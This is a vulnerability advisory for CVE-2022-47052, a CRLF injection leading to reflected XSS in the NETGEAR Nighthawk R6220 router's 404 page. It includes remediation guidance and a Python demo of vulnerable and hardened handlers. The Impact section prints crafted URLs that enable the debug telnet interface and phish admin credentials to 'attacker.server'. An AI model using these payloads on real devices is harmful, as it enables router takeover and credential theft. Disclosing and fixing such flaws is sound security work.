CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR
The web interface of the ‘Nighthawk R6220 AC1200 Smart Wi-Fi Router’ is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.
Response Splitting via CRLF
Description
CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html
Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP uses the control characters \r and \n to delimit header lines and to separate the header block from the body. If user-supplied data is written into a header without these characters being neutralized, an attacker can terminate the header early and append payloads of their own, which can result in the manipulation of cookies, server information, status codes, and ultimately the response body that the browser renders.
Type: Unauthenticated Remote attack
Tested on firmware version: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1
Details
The web interface of the ‘Nighthawk R6220 AC1200 Smart Wi-Fi Router’ is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.
This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user’s browser.
Impact
A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:
Perform actions on the administrative portion of the web application. Example payload that enables the debug telnet interface:
https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
Obtain the administrator's credentials through phishing. Example phishing payload (the entered username and password are sent to the attacker's server as query-string parameters):
https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"&pass="+pass;</script>
Note that if another vulnerability is present in the administrative portal, such as a Remote Command Execution (RCE), an attacker can chain the two vulnerabilities in a single specially crafted URL to create a one-click exploit.
Evidence
The request consists of a resource that does not exist (“xsstesty”) followed by Line-Feed characters (%0A%0A) and the JavaScript payload.
Request
GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionid=sid17289xxx158005xxx1087458037
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Note that the injected %0A%0A terminates the header block early, so everything the server emits after the reflected request path, including its own 404 status line and the security headers (X-Frame-Options, X-XSS-Protection, X-Content-Type-Options), lands in the response body instead of being honoured as headers. The browser therefore renders the reflected <script> element as part of the 404 page and the payload is executed in the victim's browser.
Response Body
<script>alert('xss');</script> HTTP/1.1 404 Not Found
Server:
Date: Fri, 02 Jan 1970 02:44:27 GMT
Content-Type: text/html
P3P: 443
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1;mode=block
X-Content-Type-Options: nosniff
Connection: close
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>404 Not Found</H4>
File not found.
</BODY>
</HTML>
Remediation
Never copy user-supplied data (here, the request path) into HTTP response headers without neutralizing it: reject or strip CR (\r) and LF (\n) and other control characters, or percent-encode the value before it is written to a header, so that an attacker cannot inject a line break that ends the header block. Separately, HTML-encode any user-supplied data that is reflected into the body of the 404 page so that it cannot be interpreted as markup.
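The following added example (not code from the advisory or from NETGEAR firmware) reproduces the mechanism described in the Evidence and Remediation sections. It models the router's 404 handler as a hypothetical server that copies the decoded request target into an X-Requested-URI response header; that header name, the handler code, and the constructed 404 page are assumptions chosen to reproduce the captured behaviour, since the firmware's real code is not shown on the page (in particular, the model does not reproduce the router's own status line ending up in the body, only its security headers). browser_view() splits a raw response the way a lenient client does, treating a bare LF as a line break, which is what lets the injected %0A%0A end the header block. hardened_404() shows the remediation: a reflected value containing any control character is refused before it can reach a header.

```python
import re
from urllib.parse import unquote

# Constructed 404 page, modelled on the body shown in the advisory.
HTML_404 = (
    b"<HTML>\n<HEAD><TITLE>404 Not Found</TITLE></HEAD>\n"
    b"<BODY><H4>404 Not Found</H4>\nFile not found.\n</BODY>\n</HTML>\n"
)

# Headers the router sends with its 404 page (taken from the captured response).
SECURITY_HEADERS = [
    (b"Content-Type", b"text/html"),
    (b"X-Frame-Options", b"SAMEORIGIN"),
    (b"X-XSS-Protection", b"1;mode=block"),
    (b"X-Content-Type-Options", b"nosniff"),
    (b"Connection", b"close"),
]

# Request target from the advisory's Evidence section.
PAYLOAD_TARGET = "/xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E"


def build_response(status: bytes, headers: list, body: bytes) -> bytes:
    """Serialise an HTTP/1.1 response exactly as given; performs no validation."""
    out = b"HTTP/1.1 " + status + b"\r\n"
    for name, value in headers:
        out += name + b": " + value + b"\r\n"
    return out + b"\r\n" + body


def vulnerable_404(request_target: str) -> bytes:
    """Hypothetical vulnerable handler (assumption, not the firmware's code):
    the percent-decoded request target is copied into a header value without
    neutralising CR/LF, which is the CWE-93 pattern the advisory describes."""
    reflected = unquote(request_target).encode("utf-8", "replace")
    headers = [(b"X-Requested-URI", reflected)] + SECURITY_HEADERS
    return build_response(b"404 Not Found", headers, HTML_404)


def hardened_404(request_target: str) -> bytes:
    """Remediated handler: a value containing any CR/LF or other control
    character is refused with 400 rather than 'cleaned', so no
    attacker-controlled line break can ever reach the header block."""
    reflected = unquote(request_target)
    if re.search(r"[\x00-\x1f\x7f]", reflected):
        return build_response(b"400 Bad Request", SECURITY_HEADERS, b"Bad request.\n")
    headers = [(b"X-Requested-URI", reflected.encode("utf-8", "replace"))] + SECURITY_HEADERS
    return build_response(b"404 Not Found", headers, HTML_404)


def browser_view(raw: bytes):
    """Split a raw response the way a lenient client does: the header block
    ends at the first blank line, and a bare LF counts as a line terminator
    (RFC 9112 allows recipients to accept a lone LF). Returns
    (status_line, {lower-cased header name: value}, body)."""
    m = re.search(rb"\r?\n\r?\n", raw)
    head, body = raw[: m.start()], raw[m.end():]
    lines = re.split(rb"\r?\n", head)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


if __name__ == "__main__":
    for handler in (vulnerable_404, hardened_404):
        status, hdrs, body = browser_view(handler(PAYLOAD_TARGET))
        print(handler.__name__, status, sorted(hdrs), body[:60])
```

Running the script shows the difference the advisory describes: with the vulnerable handler the client sees only the reflected header before the injected blank line, the nosniff and X-XSS-Protection headers appear as text inside the body, and the body begins with the attacker's script; with the hardened handler the request is rejected and every security header is delivered as a real header.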